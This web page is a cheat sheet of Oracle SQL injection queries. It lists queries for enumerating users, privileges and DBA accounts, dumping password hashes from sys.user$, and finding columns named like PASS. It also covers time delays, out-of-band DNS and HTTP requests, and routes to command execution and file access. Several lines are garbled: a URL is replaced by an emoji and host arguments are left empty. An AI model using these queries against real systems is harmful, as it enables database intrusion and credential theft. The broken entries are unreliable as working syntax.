ORACLE Sqli Cheat Sheet

oracle - ORACLE Sqli Cheat Sheet

VersionSELECT banner FROM v$version WHERE banner LIKE ‘Oracle%’;SELECT banner FROM v$version WHERE banner LIKE ‘TNS%’;SELECT version FROM v$instance;
CommentsSELECT 1 FROM dual — comment– NB: SELECT statements must have a FROM clause in Oracle so we have to use the dummy table name ‘dual’ when we’re not actually selecting from a table.
Current UserSELECT user FROM dual
List UsersSELECT username FROM all_users ORDER BY username;SELECT name FROM sys.user$; — priv
List Password HashesSELECT name, password, astatus FROM sys.user$ — priv, <= 10g. astatus tells you if acct is lockedSELECT name,spare4 FROM sys.user$ — priv, 11g
Password Crackercheckpwd will crack the DES-based hashes from Oracle 8, 9 and 10.
List PrivilegesSELECT * FROM session_privs; — current privsSELECT * FROM dba_sys_privs WHERE grantee = ‘DBSNMP’; — priv, list a user’s privsSELECT grantee FROM dba_sys_privs WHERE privilege = ‘SELECT ANY DICTIONARY’; — priv, find users with a particular priv


List DBA AccountsSELECT DISTINCT grantee FROM dba_sys_privs WHERE ADMIN_OPTION = ‘YES’; — priv, list DBAs, DBA roles
Current DatabaseSELECT global_name FROM global_name;SELECT name FROM v$database;SELECT instance_name FROM v$instance;


List DatabasesSELECT DISTINCT owner FROM all_tables; — list schemas (one per user)– Also query TNS listener for other databases. See tnscmd (services | status).
List ColumnsSELECT column_name FROM all_tab_columns WHERE table_name = ‘blah’;SELECT column_name FROM all_tab_columns WHERE table_name = ‘blah’ and owner = ‘foo’;
List TablesSELECT table_name FROM all_tables;SELECT owner, table_name FROM all_tables;
Find Tables From Column NameSELECT owner, table_name FROM all_tab_columns WHERE column_name LIKE ‘%PASS%’; — NB: table names are upper case
Select Nth RowSELECT username FROM (SELECT ROWNUM r, username FROM all_users ORDER BY username) WHERE r=9; — gets 9th row (rows numbered from 1)
Select Nth CharSELECT substr(‘abcd’, 3, 1) FROM dual; — gets 3rd character, ‘c’
Bitwise ANDSELECT bitand(6,2) FROM dual; — returns 2SELECT bitand(6,1) FROM dual; — returns0
ASCII Value -> CharSELECT chr(65) FROM dual; — returns A
Char -> ASCII ValueSELECT ascii(‘A’) FROM dual; — returns 65
CastingSELECT CAST(1 AS char) FROM dual;SELECT CAST(‘1’ AS int) FROM dual;
String ConcatenationSELECT ‘A’ || ‘B’ FROM dual; — returns AB
If StatementBEGIN IF 1=1 THEN dbms_lock.sleep(3); ELSE dbms_lock.sleep(0); END IF; END; — doesn’t play well with SELECT statements
Case StatementSELECT CASE WHEN 1=1 THEN 1 ELSE 2 END FROM dual; — returns 1SELECT CASE WHEN 1=2 THEN 1 ELSE 2 END FROM dual; — returns 2
Avoiding QuotesSELECT chr(65) || chr(66) FROM dual; — returns AB
Time DelayBEGIN DBMS_LOCK.SLEEP(5); END; — priv, can’t seem to embed this in a SELECTSELECT UTL_INADDR.get_host_name(‘’) FROM dual; — if reverse looks are slowSELECT UTL_INADDR.get_host_address(‘’) FROM dual; — if forward lookups are slow

SELECT UTL_HTTP.REQUEST(‘😉 FROM dual; — if outbound TCP is filtered / slow

— Also see Heavy Queries to create a time delay

Make DNS RequestsSELECT UTL_INADDR.get_host_address(‘’) FROM dual;SELECT UTL_HTTP.REQUEST(‘😉 FROM dual;
Command ExecutionJavacan be used to execute commands if it’s installed.ExtProc can sometimes be used too, though it normally failed for me. 🙁
Local File AccessUTL_FILEcan sometimes be used. Check that the following is non-null:SELECT value FROM v$parameter2 WHERE name = ‘utl_file_dir’;Java can be used to read and write files if it’s installed (it is not available in Oracle Express).
Hostname, IP AddressSELECT UTL_INADDR.get_host_name FROM dual;SELECT host_name FROM v$instance;SELECT UTL_INADDR.get_host_address FROM dual; — gets IP address

SELECT UTL_INADDR.get_host_name(‘’) FROM dual; — gets hostnames

Location of DB filesSELECT name FROM V$DATAFILE;
Default/System DatabasesSYSTEMSYSAUX

Add a Comment